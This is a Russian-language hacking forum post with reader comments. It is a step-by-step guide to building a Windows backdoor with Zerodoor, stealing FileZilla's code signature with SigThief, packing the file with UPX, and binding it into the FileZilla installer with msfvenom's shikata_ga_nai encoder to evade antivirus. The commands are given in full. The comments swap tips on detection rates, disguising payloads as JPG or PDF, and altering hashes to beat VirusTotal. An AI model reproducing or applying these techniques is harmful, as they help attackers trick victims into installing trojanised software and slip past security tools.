• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Прячем свой Бэкдор

codeby.png

Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же
1518541100542.png


Скажу честно это мой лучший результат )

Основная часть

Для всего процесса нам понядобятся :
Zerodoor - https://github.com/Souhardya/Zerodoor
SigThief - https://github.com/secretsquirrel/SigThief
UPX - apt install
upx
msfvenom

Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем
1518542328241.png


Запустили программу и выбираем нужные пункты :
1518542518109.png

1518542595411.png
1518542633705.png

тут ваш ip , что бы узнать ip вводим ifconfig
1518542729158.png
Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :

1518543630655.png

Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу
Код:
 python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe

-i - путь до файла с подписью
-t - путь до нашего файла
-o - путь до нашего будующего файла

1518544353658.png


Все подпись подделана. Теперь сожмем файл спомощью UPX

Код:
upx -5 /путь до файла

1518544615823.png


Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla

Код:
msfvenom -a x86 --platform Windows  -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5
1518546240846.png


Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)
 

Вложения

  • 1518542218019.png
    1518542218019.png
    24,3 КБ · Просмотры: 283
  • 1518542551126.png
    1518542551126.png
    62,7 КБ · Просмотры: 275
  • 1518542572866.png
    1518542572866.png
    59,9 КБ · Просмотры: 276

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
+ за труды. Я делал немного проще ) Связка Shelter + SigThief = 1/36 детект. Единственное что не устраивает - билд в формате exe. Jpg или PDF смотрелись бы куда удачнее
 
F

F91ruz

changer hash MD5 на ютюбе нашел. И вирус тотал не узнает уже файл. Правда там из под окон:
 
  • Нравится
Реакции: danaez

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Сегодня пробовал. палится (ну или хз чё он выпендривается:unsure:):

Screenshot from 2018-08-07 10-49-57.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!